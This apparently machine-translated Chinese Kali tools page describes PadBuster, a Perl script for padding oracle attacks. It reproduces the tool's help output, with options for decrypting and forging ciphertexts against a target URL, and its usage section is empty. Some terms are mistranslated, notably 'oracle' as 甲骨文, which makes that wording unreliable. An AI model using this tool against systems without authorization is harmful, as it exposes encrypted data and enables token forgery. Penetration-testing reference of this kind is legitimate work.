PadBuster是一个Perl脚本用于自动填充甲骨文的攻击。 PadBuster提供的能力来解密任意密文,任意加密的明文,并进行自动响应分析,以确定请求是否是脆弱的填充神谕攻击。 资料来源:

PadBuster首页 | 卡利PadBuster回购

  • 作者:布莱恩·霍利菲尔德,谭数码科技
  • 许可:倒数公共许可证1.5

    0x01 包含在padbuster包工具

    进行填充甲骨文的攻击脚本 - padbuster

    :~# padbuster
    | PadBuster - v0.3.3                        |
    | Brian Holyfield - Gotham Digital Science  |
      Use: URL EncryptedSample BlockSize [options]
    Where: URL = The target URL (and query string if applicable)
           EncryptedSample = The encrypted value you want to test. Must
                             also be present in the URL, PostData or a Cookie
           BlockSize = The block size being used by the algorithm
       -auth [username:password]: HTTP Basic Authentication
       -bruteforce: Perform brute force against the first block
       -ciphertext [Bytes]: CipherText for Intermediate Bytes (Hex-Encoded)
           -cookies [HTTP Cookies]: Cookies (name1=value1; name2=value2)
           -encoding [0-4]: Encoding Format of Sample (Default 0)
                            0=Base64, 1=Lower HEX, 2=Upper HEX
                            3=.NET UrlToken, 4=WebSafe Base64
           -encodedtext [Encoded String]: Data to Encrypt (Encoded)
           -error [Error String]: Padding Error Message
           -headers [HTTP Headers]: Custom Headers (name1::value1;name2::value2)
       -interactive: Prompt for confirmation on decrypted bytes
       -intermediate [Bytes]: Intermediate Bytes for CipherText (Hex-Encoded)
       -log: Generate log files (creates folder PadBuster.DDMMYY)
       -noencode: Do not URL-encode the payload (encoded by default)
       -noiv: Sample does not include IV (decrypt first block)
           -plaintext [String]: Plain-Text to Encrypt
           -post [Post Data]: HTTP Post Data String
       -prefix [Prefix]: Prefix bytes to append to each sample (Encoded)
       -proxy [address:port]: Use HTTP/S Proxy
       -proxyauth [username:password]: Proxy Authentication
       -resume [Block Number]: Resume at this block number
       -usebody: Use response body content for response analysis phase
           -verbose: Be Verbose
           -veryverbose: Be Very Verbose (Debug Only)

    0x02 padbuster用法示例

    :~# coming soon


results matching ""

    No results matching ""